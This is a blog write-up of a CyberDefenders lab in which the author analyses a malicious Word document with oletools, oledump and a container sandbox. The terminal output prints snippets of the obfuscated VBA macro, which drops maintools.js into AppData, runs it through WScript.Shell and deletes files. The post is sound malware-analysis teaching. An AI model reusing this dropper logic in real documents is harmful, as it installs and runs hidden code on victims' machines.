<!DOCTYPE html><html lang="en" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>CyberDefenders - Obfuscated | Notepad+++</title><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="CyberDefenders - Obfuscated" /><meta name="author" content="remotephone" /><meta property="og:locale" content="en_US" /><meta name="description" content="Obfuscated" /><meta property="og:description" content="Obfuscated" /><link rel="canonical" href="https://remotephone.github.io/posts/CyberDefenders_Obfuscated/" /><meta property="og:url" content="https://remotephone.github.io/posts/CyberDefenders_Obfuscated/" /><meta property="og:site_name" content="Notepad+++" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-10-20T11:24:00-05:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="CyberDefenders - Obfuscated" /><meta name="twitter:site" content="@remotephone" /><meta name="twitter:creator" content="@remotephone" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"remotephone"},"description":"Obfuscated","@type":"BlogPosting","headline":"CyberDefenders - Obfuscated","url":"https://remotephone.github.io/posts/CyberDefenders_Obfuscated/","dateModified":"2021-10-20T11:24:00-05:00","datePublished":"2021-10-20T11:24:00-05:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://remotephone.github.io/posts/CyberDefenders_Obfuscated/"},"@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"> <!-- CSS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <!-- JS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --> <script src="/assets/js/post.min.js" async></script> <script src="/app.js" defer></script><meta name="twitter:site" content="@"><meta name="twitter:creator" content="@remotephone"><meta name="twitter:title" content="CyberDefenders - Obfuscated"><meta name="twitter:description" content="My personal blog, mostly security focused."><meta name="twitter:card" content="summary_large_image"><meta name="twitter:image" content="https://remotephone.github.io/images/avatar.jpg"><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/images/avatar.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">Notepad+++</a></div><div class="site-subtitle font-italic">Break it, fix it, write it down.</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <span id="mode-toggle-wrapper"> <!-- Switch the mode between dark and light. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <i class="mode-toggle fas fa-sun" dark-mode-invisible></i> <i class="mode-toggle fas fa-moon" light-mode-invisible></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.mode != null) { if (this.mode == ModeToggle.DARK_MODE) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.mode != null) { if (self.mode == ModeToggle.DARK_MODE) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightkMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightkMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span> <span class="icon-border"></span> <a href="https://github.com/remotephone" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/remotephone" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:window.open('mailto:' + ['remotephone','gmail.com'].join('@'))" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" > <i class="fas fa-rss"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>CyberDefenders - Obfuscated</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>CyberDefenders - Obfuscated</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Wed, Oct 20, 2021, 11:24 AM -0500" > Oct 20, 2021 <i class="unloaded">2021-10-20T11:24:00-05:00</i> </span> by <span class="author"> remotephone </span></div><div> Updated <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Fri, Jul 8, 2022, 10:17 PM -0500" > Jul 8 <i class="unloaded">2022-07-08T22:17:59-05:00</i> </span></div></div><div class="post-content"><h1 id="obfuscated">Obfuscated</h1><p>Back again for another CyberDefenders post. This is <a href="https://cyberdefenders.org/labs/76">Obfuscated</a> and I’ll work this like the last one, poke around before I answer any questions. The prompt again is pretty simple, you got a document, gotta tell them what it is.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>During your shift as a SOC analyst, the enterprise EDR alerted a suspicious behavior from an end-user machine. The user indicated that he received a recent email with a DOC file from an unknown sender and passed the document for you to analyze.
</pre></table></code></div></div><p>I downloaded the document, moved it to my linux environment, unzipped it with the password, and began.</p><h2 id="looking-around">Looking around</h2><p>First things first, get the sha256 of the file and run <code class="language-plaintext highlighter-rouge">file</code> on it to see what we got.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre>└─(23:32:09)──&gt; ls                                                                                                                                                   ──(Mon,Oct04)─┘
49b367ac261a722a7c2bbbc328c32545  c58-js-backdoor.zip
┌─(~/scratch)────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(23:32:09)──&gt; sha256sum                                                                                                                                            ──(Mon,Oct04)─┘
┌─(~/scratch)────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(23:34:13)──&gt; ls -asl                                                                                                                                        130 ↵ ──(Mon,Oct04)─┘
total 368
  4 drwxr-xr-x  2 computer computer   4096 Oct  4 23:31 .
  4 drwxr-xr-x 22 computer computer   4096 Oct  4 23:34 ..
196 -rw-r--r--  1 computer computer 199680 Sep 16 21:02 49b367ac261a722a7c2bbbc328c32545
164 -rwxrwxrwx  1 computer computer 164336 Oct  4 23:30 c58-js-backdoor.zip
┌─(~/scratch)────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(23:34:15)──&gt; sha256sum 49b367ac261a722a7c2bbbc328c32545                                                                                                           ──(Mon,Oct04)─┘
ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751  49b367ac261a722a7c2bbbc328c32545
┌─(~/scratch)────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(23:34:19)──&gt; file 49b367ac261a722a7c2bbbc328c32545                                                                                                                ──(Mon,Oct04)─┘
49b367ac261a722a7c2bbbc328c32545: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: user, Template: Normal.dotm, Last Saved By: John, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 08:00, Create Time/Date: Fri Nov 25 19:04:00 2016, Last Saved Time/Date: Fri Nov 25 20:04:00 2016, Number of Pages: 1, Number of Words: 320, Number of Characters: 1828, Security: 0
</pre></table></code></div></div><p>As expected, an office document.</p><p>We’re going to use oletools again because they’re the best. I created a virtual environment with pipenv and then installed the tools with <code class="language-plaintext highlighter-rouge">pipenv install oletools</code>. First we use oledir to see the structure of the document.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
</pre><td class="rouge-code"><pre>(scratch) ┌─(~/scratch)────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/4)─┐
└─(23:36:12)──&gt; oledir 49b367ac261a722a7c2bbbc328c32545                                                                                                              ──(Mon,Oct04)─┘
oledir 0.54 - http://decalage.info/python/oletools
OLE directory entries in file 49b367ac261a722a7c2bbbc328c32545:
----+------+-------+----------------------+-----+-----+-----+--------+------
id  |Status|Type   |Name                  |Left |Right|Child|1st Sect|Size  
----+------+-------+----------------------+-----+-----+-----+--------+------
0   |&lt;Used&gt;|Root   |Root Entry            |-    |-    |10   |11E     |13312 
1   |&lt;Used&gt;|Stream |Data                  |-    |-    |-    |106     |4096  
2   |&lt;Used&gt;|Stream |WordDocument          |9    |-    |-    |0       |133755
3   |&lt;Used&gt;|Storage|ObjectPool            |-    |-    |4    |0       |0     
4   |&lt;Used&gt;|Storage|_1541577328           |-    |-    |6    |0       |0     
5   |&lt;Used&gt;|Stream |\x03EPRINT            |-    |-    |-    |113     |5000  
6   |&lt;Used&gt;|Stream |\x01CompObj           |5    |7    |-    |0       |76    
7   |&lt;Used&gt;|Stream |\x03ObjInfo           |-    |8    |-    |2       |6     
8   |&lt;Used&gt;|Stream |\x01Ole10Native       |-    |-    |-    |120     |20301 
9   |&lt;Used&gt;|Stream |1Table                |1    |24   |-    |174     |8017  
10  |&lt;Used&gt;|Stream |\x05SummaryInformation|2    |11   |-    |3       |392   
11  |&lt;Used&gt;|Stream |\x05DocumentSummaryInf|-    |-    |-    |A       |284   
    |      |       |ormation              |     |     |     |        |      
12  |&lt;Used&gt;|Storage|Macros                |-    |-    |22   |0       |0     
13  |&lt;Used&gt;|Storage|VBA                   |-    |-    |17   |0       |0     
14  |&lt;Used&gt;|Stream |dir                   |-    |-    |-    |F       |565   
15  |&lt;Used&gt;|Stream |Module1               |14   |16   |-    |14B     |7117  
16  |&lt;Used&gt;|Stream |__SRP_0               |-    |-    |-    |18      |2964  
17  |&lt;Used&gt;|Stream |__SRP_1               |15   |19   |-    |47      |195   
18  |&lt;Used&gt;|Stream |__SRP_2               |-    |-    |-    |4B      |2717  
19  |&lt;Used&gt;|Stream |__SRP_3               |18   |20   |-    |76      |290   
20  |&lt;Used&gt;|Stream |ThisDocument          |-    |21   |-    |7B      |1104  
21  |&lt;Used&gt;|Stream |_VBA_PROJECT          |-    |-    |-    |8D      |3467  
22  |&lt;Used&gt;|Stream |PROJECT               |13   |23   |-    |C4      |483   
23  |&lt;Used&gt;|Stream |PROJECTwm             |-    |-    |-    |CC      |65    
24  |&lt;Used&gt;|Stream |\x01CompObj           |12   |3    |-    |CE      |114   
25  |unused|Empty  |                      |-    |-    |-    |0       |0     
26  |unused|Empty  |                      |-    |-    |-    |0       |0     
27  |unused|Empty  |                      |-    |-    |-    |0       |0     
----+----------------------------+------+--------------------------------------
id  |Name                        |Size  |CLSID                                 
----+----------------------------+------+--------------------------------------
0   |Root Entry                  |-     |00020906-0000-0000-C000-000000000046  
    |                            |      |Microsoft Word 97-2003 Document       
    |                            |      |(Word.Document.8)                     
24  |\x01CompObj                 |114   |                                      
11  |\x05DocumentSummaryInformati|284   |                                      
    |on                          |      |                                      
10  |\x05SummaryInformation      |392   |                                      
9   |1Table                      |8017  |                                      
1   |Data                        |4096  |                                      
12  |Macros                      |-     |                                      
22  |  PROJECT                   |483   |                                      
23  |  PROJECTwm                 |65    |                                      
13  |  VBA                       |-     |                                      
15  |    Module1                 |7117  |                                      
20  |    ThisDocument            |1104  |                                      
21  |    _VBA_PROJECT            |3467  |                                      
16  |    __SRP_0                 |2964  |                                      
17  |    __SRP_1                 |195   |                                      
18  |    __SRP_2                 |2717  |                                      
19  |    __SRP_3                 |290   |                                      
14  |    dir                     |565   |                                      
3   |ObjectPool                  |-     |                                      
4   |  _1541577328               |-     |0003000C-0000-0000-C000-000000000046  
    |                            |      |OLE Package Object (may contain and   
    |                            |      |run any file)                         
6   |    \x01CompObj             |76    |                                      
8   |    \x01Ole10Native         |20301 |                                      
5   |    \x03EPRINT              |5000  |                                      
7   |    \x03ObjInfo             |6     |                                      
2   |WordDocument                |133755|                                      
(scratch) ┌─(~/scratch)────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/4)─┐
└─(23:36:43)──&gt;                                                                                                                                                      ──(Mon,Oct04)─┘
</pre></table></code></div></div><p>Then we’ll do an <code class="language-plaintext highlighter-rouge">olevba</code> and see the summary of what we’ve got.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
</pre><td class="rouge-code"><pre>
(scratch) ┌─(~/scratch)────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/4)─┐
└─(23:37:12)──&gt; olevba 49b367ac261a722a7c2bbbc328c32545                                                                                                              ──(Mon,Oct04)─┘
olevba 0.56.1 on Python 3.8.5 - http://decalage.info/python/oletools
===============================================================================
FILE: 49b367ac261a722a7c2bbbc328c32545
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: 49b367ac261a722a7c2bbbc328c32545 - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
&lt;SNIP&gt; 
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AutoOpen            |Runs when the Word document is opened        |
|AutoExec  |AutoClose           |Runs when the Word document is closed        |
|Suspicious|Environ             |May read system environment variables        |
|Suspicious|Open                |May open a file                              |
|Suspicious|Put                 |May write to a file (if combined with Open)  |
|Suspicious|Binary              |May read or write a binary file (if combined |
|          |                    |with Open)                                   |
|Suspicious|Kill                |May delete a file                            |
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|WScript.Shell       |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Run                 |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|Windows             |May enumerate application windows (if        |
|          |                    |combined with Shell.Application object)      |
|Suspicious|Xor                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|IOC       |maintools.js        |Executable file name                         |
+----------+--------------------+---------------------------------------------+
</pre></table></code></div></div><p>You can use <code class="language-plaintext highlighter-rouge">oledump</code> to extract specific ole objects. Let’s see a summary:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre><td class="rouge-code"><pre>(scratch) ┌─(~/scratch)───────────────────────────────────────────────────────────────────────────────(computer@computer:pts/4)─┐
└─(00:15:24)──&gt; python3 oledump.py 49b367ac261a722a7c2bbbc328c32545                               127 ↵ ──(Wed,Oct20)─┘
  1:       114 '\x01CompObj'
  2:       284 '\x05DocumentSummaryInformation'
  3:       392 '\x05SummaryInformation'
  4:      8017 '1Table'
  5:      4096 'Data'
  6:       483 'Macros/PROJECT'
  7:        65 'Macros/PROJECTwm'
  8: M    7117 'Macros/VBA/Module1'
  9: m    1104 'Macros/VBA/ThisDocument'
 10:      3467 'Macros/VBA/_VBA_PROJECT'
 11:      2964 'Macros/VBA/__SRP_0'
 12:       195 'Macros/VBA/__SRP_1'
 13:      2717 'Macros/VBA/__SRP_2'
 14:       290 'Macros/VBA/__SRP_3'
 15:       565 'Macros/VBA/dir'
 16:        76 'ObjectPool/_1541577328/\x01CompObj'
 17: O   20301 'ObjectPool/_1541577328/\x01Ole10Native'
 18:      5000 'ObjectPool/_1541577328/\x03EPRINT'
 19:         6 'ObjectPool/_1541577328/\x03ObjInfo'
 20:    133755 'WordDocument'
</pre></table></code></div></div><p>The interesting objects with macros appear to be 8 and 9. Let’s look at 8 first (truncated some).</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
</pre><td class="rouge-code"><pre>(scratch) ┌─(~/scratch)───────────────────────────────────────────────────────────────────────────────(computer@computer:pts/4)─┐
└─(00:15:29)──&gt; python3 oledump.py 49b367ac261a722a7c2bbbc328c32545 -s 8 -v                         2 ↵ ──(Wed,Oct20)─┘
Attribute VB_Name = "Module1"
Public OBKHLrC3vEDjVL As String
Public B8qen2T433Ds1bW As String
&lt;SNIP..... &gt;
On Error Resume Next
Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
R7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW &amp; "\*.*", True
Set R7Ks7ug4hRR2weOy7 = Nothing
End Sub
&lt;SNIP..... &gt;
End If
B8qen2T433Ds1bW = Environ("appdata") &amp; "\Microsoft\Windows"
Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
If Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then
B8qen2T433Ds1bW = Environ("appdata")
End If
Set R7Ks7ug4hRR2weOy7 = Nothing
Dim K764B5Ph46Vh
K764B5Ph46Vh = FreeFile
OBKHLrC3vEDjVL = B8qen2T433Ds1bW &amp; "\" &amp; "maintools.js"
Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh
Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
Close #K764B5Ph46Vh
Erase Wk4o3X7x1134j
Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " EzZETcSXyKAdF_e5I2i1"
&lt;SNIP..... &gt;

</pre></table></code></div></div><p>At this point, we can reasonable assume a file called <code class="language-plaintext highlighter-rouge">maintools.js</code> is going to get extracted and dropped to disk and executed via wscript.shell.</p><p>There is a tool called <a href="https://github.com/decalage2/ViperMonkey">ViperMonkey</a> that will let you execute macros without actually running them, but I was struggling to get it working in python3 and didn’t want to go through the the whole exercise of getting it working. You also have the option of running it in a local sandbox, but I don’t have a copy of MS Office around and don’t typically keep windows VMs around for malware analysis.</p><p>Fortunately, this isn’t sensitive, we can use cloud sandboxes, and any.run is a great one with a ton of features. We can use it to skip some tricky parts and get ahead.</p><p>You can find analysis of the file <a href="https://app.any.run/tasks/5840a1fa-9ad9-4c9e-963a-7bc5b6fa3eff/">here</a>, I didn’t even have to upload it, someone already did. We are going to just go by the honor system here and use it for the parts we need it and do the rest manually. Let’s find the <code class="language-plaintext highlighter-rouge">maintools.js</code> file and see what we can get from it. You can find the file under the files tab and then click the file and view the content under the preview tab.</p><p>I’m going to do this in a docker container to avoid the hassle of a VM and get some quick answers. This is not as secure as using an isolated virtual machine, but I’m already doing docker within a Linux VM on a host so I think it’d be tricky enough for something to get out for me to do this. I write the contents of the file using VIM to a text file and use <code class="language-plaintext highlighter-rouge">docker cp</code> to copy the file to the container</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre><td class="rouge-code"><pre>┌─(~)───────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(21:23:51)──&gt; docker cp wow 1df:/tmp/wow                                                              ──(Wed,Oct20)─┘
┌─(~)───────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(21:23:57)──&gt; vi wow                                                                                  ──(Wed,Oct20)─┘
┌─(~)───────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(21:24:09)──&gt; docker cp wow 1df:/tmp/wow                                                              ──(Wed,Oct20)─┘
┌─(~)───────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(21:24:11)──&gt; docker exec -it 1df bash                                                                ──(Wed,Oct20)─┘
root@1dfad72daf6e:/# ls /tmp
wow
</pre></table></code></div></div><p>I’ll also need to install vim and nodejs in the container and then edit the file. I look for statements that look like they could run code, eval, and stuff like that and change them to console.log. This is dirty, but can work. I defang bits as I find them and console.log where I can.</p><p>The defanged and (I think) safe to run function ends up lookign like this when I’m done.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>root@1dfad72daf6e:/# <span class="nb">head</span> /tmp/wow
try<span class="o">{</span>var wvy1 <span class="o">=</span> <span class="s1">'EzZETcSXyKAdF_e5I2i1'</span><span class="p">;</span>var ssWZ <span class="o">=</span> wvy1<span class="p">;</span>var ES3c <span class="o">=</span> y3zb<span class="o">()</span><span class="p">;</span>ES3c <span class="o">=</span> LXv5<span class="o">(</span>ES3c<span class="o">)</span><span class="p">;</span>ES3c <span class="o">=</span> CpPT<span class="o">(</span>ssWZ,ES3c<span class="o">)</span><span class="p">;</span>console.log<span class="o">(</span>ES3c<span class="o">)</span><span class="p">;</span>
<span class="o">}</span>catch <span class="o">(</span>e<span class="o">)</span>
